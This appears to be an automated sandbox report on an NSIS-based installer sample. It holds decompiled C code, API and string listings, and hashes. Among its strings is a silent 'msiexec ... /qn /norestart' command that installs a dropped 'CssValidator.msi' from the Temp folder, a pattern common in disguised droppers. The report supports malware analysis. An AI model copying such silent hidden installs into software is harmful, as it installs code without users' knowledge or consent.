Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\yRqHWQ91dT.exe" $.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp$Control Panel\Desktop\ResourceLocale$Name Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2533375534
Opcode ID: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
Opcode Fuzzy Hash: bf4b58a18f8def52aed812ad83ca3b0c7ceda486cf0da5eaf41a6ea4bc3d6bf1
Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA1, Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 181
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00402EA1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\yRqHWQ91dT.exe";
				 *0x42f430 = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\yRqHWQ91dT.exe", 0x400);
				_t89 = E00405C90(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E004060F7("C:\\Users\\alfons\\Desktop", _t91);
				E004060F7("yRqHWQ91dT.exe", E00405AD6(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E3D(1);
					__eflags =  *0x42f438 - _t82;
					if( *0x42f438 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403300( *0x42f438 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030D8(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42f434 = _t94;
							 *0x42f43c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f440 =  *0x42f440 + 1;
								__eflags =  *0x42f440;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405C4B(0x42f460, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403300( *0x41d440);
					_t65 = E004032EA( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032EA(0x415440, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E3D(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f438;
						if( *0x42f438 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E3D(0);
							}
							goto L20;
						}
						E00405C4B( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41d440; // 0x32000
						 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42f438 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42944c; // 0x73acba
						if(__eflags < 0) {
							_v12 = E004065B7(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402ea9
0x00402eac
0x00402eaf
0x00402eb2
0x00402eb8
0x00402ec9
0x00402ece
0x00402ee1
0x00402ee6
0x00402ee9
0x00402eef
0x00000000
0x00402ef1
0x00402efc
0x00402f02
0x00402f13
0x00402f1a
0x00402f20
0x00402f22
0x00402f27
0x00402f29
0x00403014
0x00403016
0x0040301b
0x00403022
0x00000000
0x00000000
0x00403024
0x00403027
0x0040304b
0x00403056
0x00403061
0x00403066
0x00403069
0x0040306a
0x0040306b
0x0040306d
0x00403072
0x00403075
0x00403088
0x0040308c
0x00403094
0x00403099
0x0040309b
0x0040309b
0x0040309b
0x004030a3
0x004030a3
0x004030a6
0x004030a7
0x004030a7
0x004030aa
0x004030ac
0x004030ac
0x004030ac
0x004030b6
0x004030bc
0x004030ca
0x004030cf
0x00000000
0x004030cf
0x00000000
0x00403075
0x0040302f
0x0040303a
0x0040303f
0x00403041
0x00000000
0x00000000
0x00403046
0x00403049
0x00000000
0x00000000
0x00000000
0x00402f2f
0x00402f34
0x00402f39
0x00402f3d
0x00402f44
0x00402f49
0x00402f4b
0x00402f4d
0x00402f4d
0x00402f51
0x00402f56
0x00402f58
0x00403080
0x00403077
0x00000000
0x00403077
0x00402f5e
0x00402f65
0x00402fe1
0x00402fe5
0x00402fe9
0x00402fee
0x00000000
0x00402fe5
0x00402f6e
0x00402f73
0x00402f76
0x00402f7b
0x00000000
0x00000000
0x00402f7d
0x00402f84
0x00000000
0x00000000
0x00402f86
0x00402f8d
0x00000000
0x00000000
0x00402f8f
0x00402f96
0x00000000
0x00000000
0x00402f98
0x00402f9f
0x00000000
0x00000000
0x00402fa1
0x00402fa7
0x00402fb0
0x00402fb6
0x00402fb9
0x00402fbb
0x00402fc1
0x00000000
0x00000000
0x00402fc7
0x00402fcb
0x00402fd3
0x00402fd3
0x00402fd6
0x00402fd6
0x00402fd9
0x00402fdb
0x00402fdd
0x00402fdd
0x00000000
0x00402fdb
0x00402fcd
0x00402fd1
0x00000000
0x00000000
0x00000000
0x00402fef
0x00402fef
0x00402ff5
0x00403001
0x00403001
0x00403004
0x0040300a
0x0040300a
0x0040300a
0x00403012
0x00403012
0x00000000
0x00403012

APIs

GetTickCount.KERNEL32 ref: 00402EB2
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\yRqHWQ91dT.exe,00000400), ref: 00402ECE

Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\yRqHWQ91dT.exe,80000000,00000003), ref: 00405C94
Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

GetFileSize.KERNEL32(00000000,00000000,yRqHWQ91dT.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yRqHWQ91dT.exe,C:\Users\user\Desktop\yRqHWQ91dT.exe,80000000,00000003), ref: 00402F1A
GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
Error launching installer, xrefs: 00402EF1
"C:\Users\user\Desktop\yRqHWQ91dT.exe" , xrefs: 00402EA1
@TA, xrefs: 00402F2F
C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
soft, xrefs: 00402F8F
Inst, xrefs: 00402F86
C:\Users\user\Desktop\yRqHWQ91dT.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
Null, xrefs: 00402F98
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
yRqHWQ91dT.exe, xrefs: 00402F0E

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\yRqHWQ91dT.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\yRqHWQ91dT.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$yRqHWQ91dT.exe
API String ID: 2803837635-289077366
Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AFC(_t82);
				_push(_t82);
				_t83 = "msiexec /i \"C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp\\CssValidator.msi\" /qn /norestart";
				if(_t33 == 0) {
					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\alfons\\AppData\\Local\\Temp\\CssValidatorInstallerTemp")), ??);
				} else {
					E004060F7();
				}
				E004063D2(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040646B(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C6B(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040521E(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E004060F7(0x40ac38, 0x430000);
						E004060F7(0x430000, _t83);
						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\alfons\AppData\Local\Temp\CssValidatorInstallerTemp",  *((intOrPtr*)(_t85 - 0x14)));
						E004060F7(0x430000, 0x40ac38);
						_t62 = E00405813("C:\Users\alfons\AppData\Local\Temp\CssValidatorInstallerTemp",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040521E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040521E(0xffffffea,  *(_t85 - 8)); // executed
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E004030D8(); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405813();
					goto L29;
				}
				goto L33;
			}

0x00401759
0x00401760
0x00401769
0x0040176c
0x0040176f
0x00401774
0x00401775
0x0040177c
0x00401798
0x0040177e
0x0040177f
0x0040177f
0x0040179e
0x004017a8
0x004017a8
0x004017ac
0x004017af
0x004017b4
0x004017b6
0x004017b8
0x004017bd
0x004017bd
0x004017c8
0x004017c8
0x004017d9
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017df
0x004017e2
0x004017e5
0x004017e5
0x004017ec
0x004017fb
0x00401800
0x00401803
0x00401806
0x00000000
0x00000000
0x00401808
0x0040180b
0x00401865
0x0040186a
0x004015b0
0x004027bf
0x004027bf
0x00402a5a
0x00402a5d
0x00402a5d
0x00000000
0x0040180d
0x00401813
0x0040181e
0x0040182b
0x00401836
0x0040184c
0x0040184c
0x0040184f
0x00000000
0x00401855
0x00401855
0x00401856
0x00401873
0x00402a63
0x00402a63
0x00402a63
0x00401858
0x00401858
0x00401859
0x00401492
0x00402387
0x00402387
0x00402387
0x00401856
0x0040184f
0x00402a65
0x00402a69
0x00402a69
0x00401883
0x00401888
0x0040188e
0x0040188f
0x00401890
0x00401893
0x00401896
0x0040189b
0x004018a1
0x004018a5
0x004018a7
0x004018af
0x004018bb
0x004018a9
0x004018a9
0x004018ad
0x00000000
0x00000000
0x004018ad
0x004018c4
0x004018ca
0x004018cc
0x00000000
0x004018d2
0x004018d2
0x004018d5
0x004018ed
0x004018d7
0x004018da
0x004018e3
0x004018e3
0x004018f2
0x004018f7
0x00402382
0x00000000
0x00402382
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,msiexec /i "C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi" /qn /norestart,C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,msiexec /i "C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi" /qn /norestart,msiexec /i "C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi" /qn /norestart,00000000,00000000,msiexec /i "C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi" /qn /norestart,C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104

Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00421FFD,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00421FFD,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00421FFD,7519EA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA

Strings

C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp, xrefs: 00401826, 00401842
msiexec /i "C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi" /qn /norestart, xrefs: 00401775, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp$C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp$msiexec /i "C:\Users\user\AppData\Local\Temp\CssValidatorInstallerTemp\CssValidator.msi" /qn /norestart
API String ID: 1941528284-2068035090
Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040521E, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040521E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x30334
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00405224
0x00405230
0x00405233
0x00405239
0x00405245
0x00405248
0x0040524b
0x00405251
0x00405251
0x00405257
0x0040525f
0x00405262
0x0040527f
0x00405283
0x0040528c
0x0040528c
0x00405296
0x0040529f
0x004052ab
0x004052b2
0x004052b6
0x004052b9
0x004052cc
0x004052da
0x004052da
0x004052de
0x004052e0
0x004052e3
0x00000000
0x004052e3
0x00405264
0x0040526c
0x00405274
0x0040527a
0x00000000
0x0040527a
0x00405274
0x00405262
0x004052ed

APIs

lstrlenA.KERNEL32(Completed,00000000,00421FFD,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
lstrlenA.KERNEL32(00403233,Completed,00000000,00421FFD,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00421FFD,7519EA30), ref: 0040527A
SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
SendMessageA.USER32 ref: 004052B2
SendMessageA.USER32 ref: 004052CC
SendMessageA.USER32 ref: 004052DA

Strings

Completed, xrefs: 0040523E, 00405250, 00405256, 00405279, 00405285

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406492(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004064a9
0x004064b2
0x004064b4
0x004064b4
0x004064b8
0x004064ca
0x004064c4
0x004064c4
0x004064c4
0x004064ce
0x004064e2
0x004064f6
0x004064fd

APIs

GetSystemDirectoryA.KERNEL32 ref: 004064A9
wsprintfA.USER32 ref: 004064E2
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6

Strings

%s%s.dll, xrefs: 004064DC
\, xrefs: 004064BA
UXTHEME, xrefs: 0040649B

Memory Dump Source

Source File: 00000001.00000002.256070105.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.256066154.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256081274.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.256086663.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256096061.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256103535.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256113831.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.256119389.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403300( *0x42f498 + _t62);
				}
				if(E004032EA( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004032EA(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004032EA(0x41d448, _t98) == 0) {
								goto L41;
							}
							if(E00405D37(_a8, 0x41d448, _t98) == 0) {
								L28:
